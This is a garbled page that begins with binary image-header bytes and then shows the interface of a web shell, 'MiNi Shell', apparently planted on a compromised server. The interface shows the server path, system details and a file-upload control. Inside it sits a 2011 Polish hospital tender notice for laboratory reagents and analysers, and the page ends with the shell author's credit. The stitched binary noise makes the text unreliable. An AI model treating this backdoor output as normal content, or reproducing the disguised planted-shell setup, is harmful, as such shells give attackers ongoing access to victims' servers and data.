JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110314/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110314/42998-N-2011.html

<p class="kh_header"><b>Bielsk Podlaski: Dostawa odczynników i dzierżawę analizatorów do tych odczynników 
dla SPZOZ w Bielsku Podlaskim</b><br>
<b>Numer ogłoszenia: 42998 - 2011; data zamieszczenia: 14.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kleszczelowska 1, 17-100 Bielsk Podlaski, woj. podlaskie, tel. 085 8332760, 8332763, faks 085 8332760.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz-bielsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników i dzierżawę analizatorów do tych odczynników 
dla SPZOZ w Bielsku Podlaskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	dostawa odczynników i dzierżawa analizatora biochemicznego
2)	dostawa odczynników i dzierżawa analizatora mikrobiologicznego
3)	dostawa odczynników i dzierżawa aparatu do analizy moczu

a.	Dla Zadania Nr 1 i 2 - 36 miesięcy liczone od daty podpisania umowy.
b.	Dla zadania Nr 3 - 12 miesięcy liczone od daty podpisania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
a)	Ocena braku podstaw do wykluczenia z postępowania w okolicznościach, o których mowa w art. 24 ust. 1 będzie dokonana przez sprawdzenie, czy żądane przez Zamawiającego dokumenty i oświadczenia potwierdzają spełnienie przesłanek z art. 24 ust. 1 ustawy (z zastrzeżeniem art. 26 ust 3 ustawy)
b)	Ocena spełnienia warunków udziału w postępowaniu będzie dokonana poprzez sprawdzenie, czy żądane przez Zamawiającego dokumenty potwierdzają spełnienie warunków wymienionych w art. 22 ust. 1 ustawy (z zastrzeżeniem art. 26 ust 3 ustawy)
c)	Wykonawca spełniający warunki określone w art. 22 ust. 1 ustawy i nie podlegający wykluczeniu na podstawie art. 24 ustawy, oprócz stosownych oświadczeń - Załączniki nr 3 i 4 do SIWZ, musi złożyć wymagane przez Zamawiającego dokumenty i oświadczenia dodatkowe (wskazane w rozdziale VI do SIWZ) potwierdzające spełnianie warunków uprawniających do udziału w postępowaniu o zamówienie publiczne.
d)	Zgodnie z art. 26 ust. 3 ustawy Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy lub, którzy nie złożyli pełnomocnictw albo, którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy lub, którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w terminie chyba, że mimo ich złożenia oferta Wykonawcy będzie podlegała odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz przez oferowane dostawy wymagań określonych przez Zamawiającego nie później niż w dniu, w którym upłynął termin składania ofert.
e)	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia albo niespełna poszczególne warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz-bielsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiajacego -zamówienia publiczne lub ze strony www.spzoz-bielsk.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2011 godzina 10:00, miejsce: siedziba zamawiającego, sekretariat, pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odczynniki i analizator biochemiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -w  pełni automatyczny wieloparametrowy analizator biochemiczny, z przystawką ISE: Na K Cl-, z  zewnętrznym  zestawem komputerowym stacją roboczą, monitor płaski minimum 17 cali, drukarka laserowa z nowym tonerem oraz odpowiedniej mocy UPS -minimum 12 h podtrzymania), z paszportem technicznym;
- z czytnikiem kodów kreskowych;
- z oprogramowaniem i instrukcja obsługi w języku polskim;
-z datą produkcji nie późniejszą niż 2008 r.
-aparat niewymagający instalacji stacji uzdatniania wody;
-z chłodzeniem odczynników, kalibratorów i kontroli (do temp. 2-8 stopni C), na pokładzie analizatora;
-z możliwością dolecenia próbek pilnych bez zatrzymywania pracy analizatora;
-z dwiema igłami odczynnikową i próbkową w celu uniknięcia kontaminacji;
-z automatycznym rozcięczaniem stężonych kalibratorów oraz próbek badanych po przekroczeniu liniowości metody;
-odczynniki płynne gotowe do użycia po wstawieniu do analizatora;
-z detektorem poziomu próbki odczynnika i obecności mikroskrzepu w próbce; 
-z możliwością dostawienia kasety odczynnikowej back-up dla zachowania ciągłości pracy analizatora;
-z możliwością wprowadzenia, co najmniej 10 własnych aplikacji odczynnikowych;
-z możliwością ciągłego zlecania badań i wydajnością minimum 300 oznaczeń fotometrycznych na godzinę;
- z możliwością wykorzystania próbek pierwotnych zamkniętego systemu aspiracyjno-próżniowego oraz próbek pediatrycznych mikro
- z pełnym programem Kontroli Jakości;
- z automatycznym podajnikiem kuwet oraz możliwością ich ciągłego uzupełniania bez zatrzymywania pracy analizatora;
- z licznikiem testów;
- z dwukierunkową transmisja danych i możliwością ciągłego zlecania badań;
- z możliwością przystąpienia do wykonania testów po wyjściu z funkcji standy w czasie nie dłuższym niż 5 minut;
-analizator będzie współpracował z  systemem Wspomagania i Zarządzania Laboratorium Centrum firmy Marcel.   Wszelkie koszty związane z podłączeniem do systemu i jego uruchomienia poniesie Wykonawca;
-z możliwością wydruków raportów dziennych wyników;
-dostawa, montaż, uruchomienie analizatora, szkolenie personelu oraz pakiet startowy odczynników, kalibratorów i kontroli i pozostałego sprzętu jednorazowego zużycia w ilościach niezbędnych do uruchomienia i sprawdzenia działania aparatu, a także odbiór aparatu po zakończeniu trwania umowy w koszcie dzierżawy; 
ANALIZATOR ZWALIDOWANY dołączyć dokument poświadczający walidację aparatu;
ZWALIDOWANE METODY OZNACZEŃ wykonywanych tym aparatem potwierdzić odpowiednim dokumentem;
Analizator wolnostojący  lub do postawienia na stole - Wykonawca zapewni taki stół. Powierzchnia w Laboratorium przeznaczona na analizator -  maksymalnie o wymiarach 160 cm x 120 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> odczynniki i analizatormikrobiologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  w pełni automatyczny analizator mikrobiologiczny, z datą produkcji nie później jak rok 2008 z zewnętrznym zestawem komputerowym (monitor płaski min. 17 cali, drukarka laserowa zewnętrzna z nowym tonerem, UPS o odpowiedniej mocy podtrzymującej pracę analizatora minimum 12 h, oraz z czytnikiem kodów kreskowych;
2.  z urządzeniem do pomiaru gęstości zawiesiny bakteryjnej;
3.  z automatycznym przetwarzaniem badań od chwili załadowania zainokulowanych testów do etapu interpretacji wyników (dopełnianie testów, inkubacja, odczyt wyników);
4.  oddzielny program do kontroli jakości, będący częścią systemu;
5.  z oprogramowaniem umożliwiającym opracowanie raportów epidemiologicznych dla wykonywanych badań (wybrany okres, oddział szpitalny, gatunki drobnoustrojów);
6.wynik wrażliwości zidentyfikowanego drobnoustroju podawany w wartościach MIC (zgodnie z wymogami EUCASTU) i w kategoriach wrażliwy, średniowrażliwy, oporny;
7.  z interpretacją wyników przez system Expertowy przedstawioną graficznie;
8.  z możliwością archiwizacji danych na CD;
9.   analizator będzie współpracował z  systemem Wspomagania i Zarządzania Laboratorium Centrum firmy Marcel.  - rozbudowa o obsługę pracowni mikrobiologi.   Wszelkie koszty związane z podłączeniem do systemu i jego uruchomienia poniesie Wykonawca;
10.  Wykonawca wyposaży pracownię mikrobiologii w stację robocza z oprogramowaniem bazodanowym MARCELL
11.  z metodyka wykonywania oznaczeń i instrukcja obsługi analizatora w języku polskim;
12.  dostawa, montaż, uruchomienie analizatora, szkolenie personelu oraz pakiet startowy odczynników, kalibratorów i kontroli i pozostałego sprzętu jednorazowego zużycia w ilościach niezbędnych do uruchomienia i sprawdzenia działania aparatu, a także odbiór aparatu po zakończeniu trwania umowy w koszcie dzierżawy; 
13.  ANALIZATOR ZWALIDOWANY dołączyć dokument poświadczający walidację aparatu;
14.  ZWALIDOWANE METODY OZNACZEŃ wykonywanych tym aparatem potwierdzić odpowiednim dokumentem;
15.   Testy do identyfikacji i antybiogramów rozdzielnie:
-z możliwością wykonania jedynie testu identyfikacji;
-z możliwością wykonania jedynie lekooporności;
-z możliwością wpisania manualnie gatunku drobnoustroju;
-z możliwością tworzenia własnych antybiogramów i   wprowadzania manualnego wyników;
16.   Możliwość identyfikacji usp. drobnoustrojów;
-bakterii Gram -ujemnych
-bakterii Gram -dodatnich
-bakterii beztlenowych;
-bakterii z rodzaju Nisseria i Haemophilus;
-drożdżaków;
17.  Oznaczanie lekowrażliwości;
- bakterii Gram -ujemnych z możliwością wyboru różnych konfiguracji antybiotyków;
- bakterii Gram -dodatnich z możliwością wyboru różnych konfiguracji antybiotyków;
18. Testy identyfikacyjne i antybiogramowe pakowane oddzielnie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Aparat do analizy moczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - aparat fabrycznie nowy (rok produkcji 2011) ze znakiem CE i dokumentem potwierdzającym, z zewnętrznym zestawem komputerowym (monitor płaski min. 17 cali, drukarka laserowa zewnętrzna z nowym tonerem, klawiatura, mysz optyczna, UPS o odpowiedniej mocy podtrzymującej pracę analizatora minimum 12 h, oraz z czytnikiem kodów kreskowych;
- z automatycznym procesem analizy moczu z wydrukiem oraz oflagowaniem wyników;
- z możliwością dopisania do wyniku mikroskopowego osadu moczu przy użyciu programu współpracującego z aparatem;
- z kalibracją automatyczną z okresem ważności  -minimum 1 miesiąca;
- analizator będzie współpracował z  systemem Wspomagania i Zarządzania Laboratorium Centrum firmy Marcel.  - rozbudowa o obsługę analityki ogólnej.  Wszelkie koszty związane z podłączeniem do systemu i jego uruchomienia poniesie Wykonawca;
- z metodyka wykonywania oznaczeń i instrukcja obsługi analizatora w języku polskim;
-dostawa, montaż, uruchomienie analizatora, szkolenie personelu oraz pakiet startowy odczynników, kalibratorów i kontroli i pozostałego sprzętu jednorazowego zużycia w ilościach niezbędnych do uruchomienia i sprawdzenia działania aparatu, a także odbiór aparatu po zakończeniu trwania umowy w koszcie dzierżawy; 
ANALIZATOR ZWALIDOWANY dołączyć dokument poświadczający walidację aparatu;
ZWALIDOWANE METODY OZNACZEŃ wykonywanych tym aparatem potwierdzić odpowiednim dokumentem;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com